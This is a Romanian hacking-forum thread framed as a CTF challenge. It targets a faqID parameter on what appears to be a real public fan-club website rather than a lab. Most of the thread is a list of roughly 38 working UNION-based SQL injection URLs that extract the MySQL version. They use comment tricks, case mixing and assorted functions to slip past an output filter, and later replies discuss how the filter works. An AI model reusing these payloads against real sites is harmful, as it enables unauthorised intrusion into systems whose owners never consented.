Jump to content
denjacker

SQL Injection challenge

By denjacker, in Challenges (CTF)

Recommended Posts

denjacker Newbie

denjacker

Posted
Posted (edited)

Se da urmatorul link:

https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50

images?q=tbn:ANd9GcRfnjoOIArIeYr7MTxdMvHlWwcg1q0JbJXuRza78DJ6bMZgfXQ&t=1&usg=__exqVw3tcnkelaiMSCnD0hn7KBjo=

INDICII: MySql, Union Based!

Scopul acestui challenge este sa gasiti "calea" prin care sa extrageti versiunea bazei de date. Atat.. doar versiunea ! :)

Se poate rezolva si blind dar eu vreau sa-l faceti UNION based..

Mentionati cum ati procedat! Puneti screenshot-uri si tot ce trebuie pentru a dovedii ca ati reusit.

Dificultate: Pretty damn hard!

Successsssssss >:D<

Edited by denjacker
Link to comment
Share on other sites
denjacker Newbie

denjacker

Posted
  • Author
Posted

Lista cu raspunsurile celor care au dat PM + alte variante posibile de raspuns:


Plitvix      --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select quote(version())-- -
tdxev:       --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select concat(char(39), version(), char(39))-- 
SirGod:      --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select+/*!50022+1*//*
michee :     --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select/**/if(@@version=5,5,4)--
tdxev:       --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+hex(hex(version()))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select (substring(version(),1,3))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select cast(version() as date)--
TinKode:     --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=-50/**/aNd/**/(1)=(2)/**/unIOn/*!*/seLEct/**/quOTe(vERSion())--+--/*
doi:         --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50/**/and/**/1=2/*AMD*/union/**/all/**/select/**/ascii(mid(@@version,1,1))--

   daemien --> alte variante
------------------------------------------

1]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ASCII(@@version)--
2]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ORD(version())--
3]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FIELD(5,version())-- 
4]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FORMAT(version(),1)--
5]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(version() AS UNSIGNED)--
6]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ABS(version())--
7]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CEILING(version())--
8]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FLOOR(@@version)--
9]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+MOD(@@version,5)--
10] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POW(@@version,1)--
11] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POWER(@@version,1)--
12] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ROUND(@@version,1)--
13] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+TRUNCATE(@@version,1)--
14] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+SQRT(@@version*version())--
15] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(@@version+AS+UNSIGNED)=5--
16] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version*2)/2--
17] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-5)+IS+NULL--
18] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+BIN(version())--
19] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-4)+IS+NOT+NULL--
20] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+BETWEEN+5+AND+10--
21] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+NOT+BETWEEN+0+AND+4--
22] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LEAST(version(),99999)--
23] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(LEAST(@@version,9999)+as+SIGNED)--
24] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CASE+WHEN+5>=(@@VERSION*2)/2+THEN+5+ELSE+4+END--
25] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+IF(5<=@@version,5,4)--
26] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LOCATE(5,@@version)--
27] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+OCT(@@version)--
28] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POSITION(5+IN+@@version)--
29] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+REVERSE(@@version*2/2)--



daca mai aveam tigari in seara aia mai gaseam :))

Link to comment
Share on other sites
tdxev Newbie

tdxev

Posted
Posted
poate sa-mi explice si mie careva de ce a folosit quote()? Sa mor daca ma prind......

Din cate am vazut eu acolo filtru se aplica in php inainte de afisare dupa extragerea datelor din baza de date.

De fitru trece ori ce string care este cuprins in ghilimele simple si care nu are in string gilimele simple, si ori ce string care este format doar din numere.

Varianta concat(char(39), version(), char(39)) am scos-o dupa ce am aflat de varianta cu quote().

Stiu ca nu prea are logica folosirea functiei quote() dar cel mai important este rezultatul.

Link to comment
Share on other sites
michee Newbie

michee

Posted
Posted
Din cate am vazut eu acolo filtru se aplica in php inainte de afisare dupa extragerea datelor din baza de date.

De fitru trece ori ce string care este cuprins in ghilimele simple si care nu are in string gilimele simple, si ori ce string care este format doar din numere.

Varianta concat(char(39), version(), char(39)) am scos-o dupa ce am aflat de varianta cu quote().

Stiu ca nu prea are logica folosirea functiei quote() dar cel mai important este rezultatul.

Si care-i logica lu ala de-a programat de-a pus un asemenea filtru?si ce anume v-a facut sa va ganditi la filtrul asta?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...